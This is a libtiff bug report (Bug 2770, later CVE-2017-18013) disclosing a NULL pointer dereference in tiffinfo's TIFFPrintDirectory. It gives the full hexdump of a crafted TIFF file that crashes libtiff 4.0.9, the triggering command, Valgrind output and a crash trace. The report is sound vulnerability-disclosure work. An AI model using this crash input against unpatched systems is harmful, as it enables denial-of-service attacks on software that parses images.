Bug 2770 - NULL Pointer Dereference in tiffinfo.c with crafted TIFF image
: NULL Pointer Dereference in tiffinfo.c with crafted TIFF image
Status: RESOLVED FIXED
: libtiff
default
: unspecified
: All All
: P2 normal
: ---
Assigned To:
:
:
:
:
:
  Show dependency treegraph
 
Reported: 2017-12-29 14:24 by
Modified: 2018-01-01 05:02 (History)


Attachments
Crafted TIFF Image to trigger the Crash (286 bytes, application/octet-stream)
2017-12-29 14:24, Kirit Sankar Gupta
Details


Note

You need to log in before you can comment on or make changes to this bug.


Description From 2017-12-29 14:24:52
Created an attachment (id=838) [details]
Crafted TIFF Image to trigger the Crash

There is a Null-Pointer Dereference occurring with tiffinfo.c in libtiff 4.0.9.
This can be triggered by running the following command:

tiffinfo -s %file%

Where a malformed TIFF file is being supplied for parsing.

The hexdump of the file causing the crash is:

0000000 4d4d 2a00 0000 0800 1700 3030 3030 3030
0000010 3030 3030 3030 0001 0300 0000 0100 3030
0000020 3030 0101 0300 0000 0100 3030 3030 3030
0000030 3030 3030 3030 3030 3030 0301 0300 0000
0000040 0100 0600 3030 3030 3030 3030 3030 3030
0000050 3030 1101 0400 3030 3030 3030 3030 3030
0000060 3030 3030 3030 3030 3030 3030 3030 3030
*
000011e

The relevant Memcheck output is:

==24890== Process terminating with default action of signal 11 (SIGSEGV)
==24890==  Access not within mapped region at address 0x0
==24890==    at 0x432F02: TIFFPrintDirectory (tif_print.c:673)
==24890==    by 0x4027EF: tiffinfo (tiffinfo.c:463)
==24890==    by 0x402406: main (tiffinfo.c:152)

The NULL Pointer Dereference seems to get triggered while parsing the "1
Strips: " section of the image in the function call TIFFPrintDirectory, where a
fprintf call is being made with a NULL pointer.

The output of tiffinfo while running the command on this file is:

./tiffinfo -s tiff_npd 
TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not
sorted in ascending order.
TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
TIFFReadDirectory: Warning, Photometric tag is missing, assuming data is YCbCr.
TIFFReadDirectory: Warning, BitsPerSample tag is missing, assuming 8 bits per
sample.
TIFFReadDirectory: Warning, SamplesPerPixel tag is missing, applying correct
SamplesPerPixel value of 3.
tiff_npd: Old-style JPEG compression support is not configured.
TIFF Directory at offset 0x8 (8)
  Image Width: 12336 Image Length: 12336
  Bits/Sample: 8
  Compression Scheme: Old-style JPEG
  Photometric Interpretation: YCbCr
  Samples/Pixel: 3
  Planar Configuration: single image plane
  1 Strips:
Segmentation fault

Debug info:

libtiff version 4.0.9
OS: Ubuntu 17.10
Compiler: gcc 7.2.0 / clang 4.0.1-6
Target: x86-64-pc-linux-gnu
------- Comment #2 From 2018-01-01 05:02:30 -------
This issue has been assigned CVE-2017-18013